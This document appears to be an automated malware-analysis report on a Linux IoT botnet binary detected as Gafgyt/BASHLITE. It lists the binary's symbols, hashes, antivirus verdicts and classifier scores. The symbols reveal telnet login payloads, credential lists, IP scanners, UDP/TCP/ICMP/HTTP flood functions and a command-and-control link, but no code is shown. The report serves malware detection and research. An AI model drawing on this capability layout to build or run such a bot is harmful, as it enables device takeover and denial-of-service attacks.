strtol.c, , _stdlib_strto_l.c, , exit.c, , execl.c, , sleep.c, , sysconf.c, , __uClibc_main.c, , __pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_done_that.2832, , sigaction.c, , __restore_rt, , __restore, , __syscall_error.c, , libc/sysdeps/linux/i386/mmap.S, , __socketcall.c, , __syscall_rt_sigaction.c, , clock_getres.c, , execve.c, , getegid.c, , getgid.c, , getpagesize.c, , getuid.c, , munmap.c, , nanosleep.c, , sbrk.c, , wait4.c, , __C_ctype_tolower.c, , errno.c, , __h_errno_location.c, , wcrtomb.c, , wcsrtombs.c, , wcsnrtombs.c, , fprintf.c, , _WRITE.c, , _fwrite.c, , _trans2w.c, , _load_inttype.c, , _store_inttype.c, , _uintmaxtostr.c, , _fpmaxtostr.c, , fmt, , exp10_table, , vfprintf.c, , memchr.c, , memmove.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , inet_aton.c, , dnslookup.c, , mylock, , static_ns, , static_id, , opennameservers.c, , get_hosts_byname_r.c, , raise.c, , dl-support.c, , brk.c, , poll.c, , fclose.c, , fopen.c, , fseeko.c, , fseeko64.c, , _adjust_pos.c, , _fopen.c, , _cs_funcs.c, , fgets.c, , fflush_unlocked.c, , fgets_unlocked.c, , strcmp.c, , strncat.c, , rawmemchr.c, , strspn.c, , strdup.c, , ntop.c, , inet_pton4, , xdigits.3116, , inet_ntop4, , encodeh.c, , decodeh.c, , encodeq.c, , lengthq.c, , decodea.c, , read_etc_hosts_r.c, , llseek.c, , tolower.c, , fgetc_unlocked.c, , strcasecmp.c, , encoded.c, , decoded.c, , lengthd.c, , _READ.c, , _rfill.c, , _trans2r.c, , __fini_array_end, , __fini_array_start, , __init_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_array_start, , __preinit_array_start, , __read_etc_hosts_r, , __GI_execve, , __libc_sigaction, , strcpy, , __GI_fcntl64, , recvLine, , __GI_sigaddset, , __socketcall, , __GI___ctype_b, , __GI_memchr, , userID, , __GI___glibc_strerror_r, , waitpid, , __open_nameservers, , __GI_fopen, , getrlimit, , ioctl, , _stdio_openlist_use_count, , __GI_initstate_r, , __GI_sigaction, , strtok_r, , __GI___C_ctype_toupper_data, , __GI_time, , getgid, , sysconf, , stdout, , random, , __GI_strdup, , __GI_getpagesize, , getdtablesize, , __GI_h_errno, , contains_fail, , __length_question, , __GI___ctype_toupper, , __GI_strcasecmp, , __GI_tolower, , putc_unlocked, , recv, , connect, , __encode_question, , __GI___uClibc_fini, , D3cOdeMePlS, , numpids, , __encode_header, , __GI_strncat, , sigemptyset, , __pthread_mutex_lock, , initConnection, , __sigdelset, , __GI_clock_getres, , __uClibc_fini, , memrchr, , geteuid, , inet_pton, , __GI_vsnprintf, , __GI_setsid, , Phonepid, , memmove, , sendTCP, , __bsd_signal, , __GI_strpbrk, , __stdio_trans2r_o, , munmap, , __GI_setsockopt, , __libc_stack_end, , __GI_fclose, , __GI_wcsnrtombs, , __GI_pipe, , _uintmaxtostr, , __libc_fcntl, , atol, , _h_errno, , getRandomPublicIP, , getc_unlocked, , __ctype_b, , __GI_random_r, , usernames, , sendUKNOWN, , errno, , getegid, , read_until_response, , __GI_sbrk, , zprintf, , NetisPid, , __GI___uClibc_init, , execve, , getpagesize, , getpid, , __GI_lseek64, , setstate_r, , fgets, , getHost, , __libc_getpid, , HackerScan1, , wildString, , __xpg_strerror_r, , fcntl64, , prctl, , memcpy, , makeRandomStr, , __GI_fputs_unlocked, , execl, , NetisScanner, , __GI_fgets, , sendHTTP, , creat, , _stdio_openlist_dec_use, , sclose, , __libc_select, , _ppfs_init, , puts, , __GI___C_ctype_toupper, , __GI_fgetc_unlocked, , __libc_nanosleep, , trim, , __GI_fgets_unlocked, , dup2, , __pthread_mutex_init, , tolower, , getuid, , system, , __open_etc_hosts, , malloc, , isatty, , sleep, , __GI_atol, , vsnprintf, , __dns_lookup, , __GI_read, , __C_ctype_tolower, , phonepayload, , random_r, , __dso_handle, , clock_getres, , gethostbyname_r, , tcpcsum, , fdpclose, , socket, , __GI_dup2, , select, , _pthread_cleanup_pop_restore, , __GI_wcrtomb, , __GI___libc_fcntl, , D1ckSuckaz, , __GI_memset, , isspace, , __stdio_seek, , mempcpy, , __GI_strcoll, , __GI_write, , __ctype_toupper, , __libc_read, , _string_syserrmsgs, , __GI_herror, , __GI_open, , __GI_strchr, , __searchdomain, , sigaddset, , __GI_tcgetattr, , __environ, , mmap, , wcsnrtombs, , makeIPPacket, , __GI_inet_ntoa, , send, , __fgetc_unlocked, , abort, , __GI_fcntl, , __GI_wcsrtombs, , __GI_fwrite_unlocked, , __GI_getgid, , srandom_r, , _init, , D1ckSucka, , __GI_inet_ntoa_r, , hostname_to_ip, , __GI_setstate_r, , parseHex, , strtol, , pipe, , __libc_lseek64, , strnlen, , rawmemchr, , __GI_mempcpy, , __malloc_state, , __GI___C_ctype_b_data, , __sigaddset, , nanosleep, , __GI_send, , h_errno, , __pthread_mutex_unlock, , wait4, , __register_frame_info_bases, , __GI_exit, , __app_fini, , csum, , __exit_cleanup, , __GI_execl, , __GI_srandom_r, , __GI___ctype_tolower, , write, , environ, , __GI_close, , getBuild, , Server_Botport, , fprintf, , __resolv_lock, , kill, , fputs_unlocked, , __pthread_mutex_trylock, , TelnetPayload2, , __GI_brk, , __GI_nanosleep, , __GI_strtok, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , ntohl, , __GI_fseek, , ourIP, , chdir, , fseeko, , _stdio_openlist_del_count, , connectTimeout, , __raise, , setsockopt, , bsd_signal, , fseek, , __GI_kill, , __GI_strcmp, , CommandPayload, , __GI_memmove, , sendSTD, , setstate, , __decode_dotted, , HackaShit, , __stdio_READ, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , __stdin, , stdin, , __GI_isatty, , strcasestr, , _start, , __deregister_frame_info_bases, , strstr, , __GI_ioctl, , init_rand, , rand, , signal, , read, , __decode_header, , __GI___h_errno_location, , __GI_memcpy, , strcoll, , wcsrtombs, , _stdio_user_locking, , strncpy, , strcasecmp, , htonl, , sendto, , __C_ctype_toupper, , __GI___C_ctype_b, , __GI_gethostbyname_r, , __GI_strncpy, , TelnetPayload, , __libc_send, , PhoneScanner, , __GI___xpg_strerror_r, , __GI___C_ctype_tolower, , __GI_getrlimit, , bcopy, , __GI_strcpy, , __GI_inet_ntop, , strtok, , __GI___fputc_unlocked, , __stdio_adjust_position, , malloc_trim, , __GI_poll, , _vfprintf_internal, , __GI_strcasestr, , fork, , __stdio_rfill, , strncat, , __GI_sleep, , sigaction, , __GI_gethostbyname, , _dl_phdr, , __GI_getc_unlocked, , __GI___libc_fcntl64, , __uClibc_init, , __GI_munmap, , _store_inttype, , __length_dotted, , __getpagesize, , __GI_random, , __syscall_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_fork, , strdup, , __libc_close, , __GI_getpid, , inet_aton, , index, , _pthread_cleanup_push_defer, , processCmd, , __sigismember, , fopen, , __bss_start, , __libc_open, , getOurIP, , get_telstate_host, , memset, , __GI_socket, , main, , __glibc_strerror_r, , listFork, , __GI___C_ctype_tolower_data, , __stdio_fwrite, , negotiate, , srand, , initstate, , fclose, , __syscall_rt_sigaction, , ntohs, , sendUDP, , inet_ntoa, , getppid, , tcgetattr, , __C_ctype_tolower_data, , time, , __libc_system, , __GI_abort, , poll, , fdpopen, , __GI_fprintf, , __get_hosts_byname_r, , __stdio_init_mutex, , __GI__exit, , botkiller, , herror, , strcmp, , advances2, , __nameserver, , data_start, , HackerScan, , __GI_sysconf, , __h_errno_location, , __GI_putc_unlocked, , matchPrompt, , __C_ctype_b_data, , __GI_inet_pton, , gethostbyname, , _stdio_fopen, , _fini, , __GI_chdir, , __vfork, , __GI_mmap, , sprintf, , fdgets, , __get_pc_thunk_bx, , strerror_r, , __GI_select, , __libc_waitpid, , socket_connect, , __GI_waitpid, , __GI_vfprintf, , _stdio_term, , __decode_answer, , __GI_signal, , stderr, , fails, , vfork, , __C_ctype_b, , srandom, , ICMPFlood, , _ppfs_setargs, , __GI_sendto, , __GI_sigemptyset, , __libc_fork, , LoginPayload, , __atexit_lock, , scanPid, , rand_cmwc, , findARandomIP, , advances, , __libc_fcntl64, , getsockopt, , __GI_fseeko64, , hstrerror, , fflush_unlocked, , __stdio_wcommit, , HackerPrint, , contains_string, , __GI___fgetc_unlocked, , __nameservers, , fwrite_unlocked, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lock, , __GI_getdtablesize, , access, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_unlocked, , __GI_strstr, , __searchdomains, , _end, , phone, , htons, , _sigintr, , _ppfs_prepargs, , __GI_strspn, , fgetc_unlocked, , initstate_r, , PhoneScan, , __GI_connect, , __curbrk, , __libc_poll, , _dl_phnum, , _fpmaxtostr, , __errno_location, , uppercase, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio_WRITE, , _stdio_init, , __GI_geteuid, , inet_ntop, , brk, , __C_ctype_toupper_data, , _dl_aux_init, , _errno, , atoi, , successes, , _stdio_openlist_del_lock, , __GI_inet_aton, , fgets_unlocked, , _exit, , szprintf, , strspn, , __libc_recv, , __libc_creat, , strlen, , lseek64, , open, , toupper, , __libc_write, , __malloc_consolidate, , _ppfs_parsespec, , __GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , __libc_sendto, , __stdio_trans2w_o, , __GI_vfork, , strchr, , __GI_rawmemchr, , __GI_raise, , __data_start, , setsid, , __GI_inet_addr, , __encode_dotted, , __GI_strnlen, , _Jv_RegisterClasses, , macAddress, , __GI___errno_location, , fputc_unlocked, , fcntl, , read_with_timeout, , __GI_atoi, , fseeko64, , __GI_sprintf, , __ctype_tolower, , wcrtomb, , __GI_getsockname, , close, , __libc_connect, , passwords, , __GI_strlen, , pids, , sendCNC, , vfprintf, , strpbrk, , _load_inttype, , rangechoice, , raise, , useragents, , free, , sigprocmask, , __fputc_unlocked, , getsockname,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x8048164
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
95428
AVclass
gafgyt
1
VirusTotal
md5
1e3eb990093ab52d6bab2f4d2faa0899
sha1
e55e89156d3cb193c3db91b79578c3a3f6dd17f1
SCANS (DETECTION RATE = 38.98%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20170807
version: 8.0.1489.320
detected: True check_circle

CMC
update: 20170805
version: 1.1.0.977
detected: False cancel

MAX
update: 20170807
version: 2017.6.26.1
detected: False cancel

Bkav
update: 20170807
version: 1.3.0.9282
detected: False cancel

K7GW
update: 20170807
version: 10.20.24212
detected: False cancel

ALYac
update: 20170807
version: 1.1.1.2
detected: False cancel

Avast
result: ELF:DDoS-Y [Trj]
update: 20170807
version: 8.0.1489.320
detected: True check_circle

Avira
result: LINUX/Gafgyt.xdweo
update: 20170807
version: 8.3.3.4
detected: True check_circle

Baidu
update: 20170807
version: 1.0.0.2
detected: False cancel

Cyren
update: 20170807
version: 5.4.30.7
detected: False cancel

DrWeb
result: Linux.BackDoor.Fgt.373
update: 20170807
version: 7.0.28.2020
detected: True check_circle

GData
result: Linux.Trojan.Agent.EE1C4H
update: 20170807
version: A:25.13734B:25.10170
detected: True check_circle

Panda
update: 20170807
version: 4.6.4.2
detected: False cancel

VBA32
update: 20170803
version: 3.12.26.4
detected: False cancel

VIPRE
update: 20170807
version: 60118
detected: False cancel

Zoner
update: 20170807
version: 1.0
detected: False cancel

AVware
update: 20170807
version: 1.5.0.42
detected: False cancel

ClamAV
result: Unix.Trojan.Mirai-5607483-0
update: 20170807
version: 0.99.2.0
detected: True check_circle

Comodo
update: 20170807
version: 27566
detected: False cancel

F-Prot
update: 20170807
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan.Linux.Gafgyt
update: 20170807
version: 0.1.5.2
detected: True check_circle

McAfee
result: RDN/Generic BackDoor
update: 20170807
version: 6.0.6.653
detected: True check_circle

Rising
update: 20170807
version: 25.0.0.1
detected: False cancel

Sophos
result: Linux/DDoS-BI
update: 20170807
version: 4.98.0
detected: True check_circle

Yandex
update: 20170801
version: 5.5.1.3
detected: False cancel

Zillya
update: 20170806
version: 2.0.0.3355
detected: False cancel

Arcabit
update: 20170807
version: 1.0.0.817
detected: False cancel

Tencent
result: Linux.Backdoor.Gafgyt.Dzko
update: 20170807
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20170807
version: 2014.3.20.0
detected: False cancel

Webroot
update: 20170807
version: 1.0.0.207
detected: False cancel

Ad-Aware
update: 20170807
version: 3.0.3.1010
detected: False cancel

AegisLab
result: Backdoor.Linux.Gafgyt!c
update: 20170807
version: 4.2
detected: True check_circle

Emsisoft
update: 20170807
version: 4.0.1.883
detected: False cancel

F-Secure
update: 20170807
version: 11.0.19100.45
detected: False cancel

Fortinet
update: 20170807
version: 5.4.247.0
detected: False cancel

Jiangmin
result: Backdoor.Linux.rie
update: 20170807
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20170807
version: 2013.8.14.323
detected: False cancel

Symantec
result: Trojan.Gen.NPE
update: 20170807
version: 1.4.0.0
detected: True check_circle

nProtect
update: 20170807
version: 2017-08-07.02
detected: False cancel

AhnLab-V3
update: 20170807
version: 3.9.2.18278
detected: False cancel

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.aj
update: 20170807
version: 3.0.0.1
detected: True check_circle

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.aj
update: 20170807
version: 15.0.1.13
detected: True check_circle

Microsoft
result: DDoS:Linux/Lightaidra!rfn
update: 20170807
version: 1.1.14003.0
detected: True check_circle

Qihoo-360
result: Win32/Trojan.DDoS.1be
update: 20170807
version: 1.0.0.1120
detected: True check_circle

TheHacker
update: 20170806
version: 6.8.0.5.1813
detected: False cancel

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.aj
update: 20170807
version: 1.0
detected: True check_circle

ESET-NOD32
result: a variant of Linux/Gafgyt.ADU
update: 20170807
version: 15873
detected: True check_circle

TrendMicro
result: Possible_BASHLITE.SMLBN1
update: 20170807
version: 9.862.0.1074
detected: True check_circle

WhiteArmor
update: 20170731
detected: False cancel

BitDefender
update: 20170807
version: 7.2
detected: False cancel

K7AntiVirus
update: 20170807
version: 10.20.24214
detected: False cancel

Malwarebytes
update: 20170807
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20170807
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
update: 20170807
version: 14.00
detected: False cancel

NANO-Antivirus
result: Trojan.Unix.Fgt.eoklid
update: 20170807
version: 1.0.94.18103
detected: True check_circle

MicroWorld-eScan
update: 20170807
version: 12.0.250.0
detected: False cancel

SUPERAntiSpyware
update: 20170807
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: RDN/Generic BackDoor
update: 20170807
version: v2015
detected: True check_circle

TrendMicro-HouseCall
result: Possible_BASHLITE.SMLBN1
update: 20170807
version: 9.950.0.1006
detected: True check_circle

total
59
sha256
2a5c4b8a739b4c1c85f4866abb02a4699112d09d60ea41b1190127412029eb54
scan_id
2a5c4b8a739b4c1c85f4866abb02a4699112d09d60ea41b1190127412029eb54-1502107149
resource
1e3eb990093ab52d6bab2f4d2faa0899
positives
23
scan_date
2017-08-07 11:59:09
verbose_msg
Scan finished, information embedded
response_code
1
Binary
RF
confidence: 100.00%
suspicious: True check_circle
MLP
confidence: 99.98%
suspicious: True check_circle
SVM
confidence: 98.80%
suspicious: True check_circle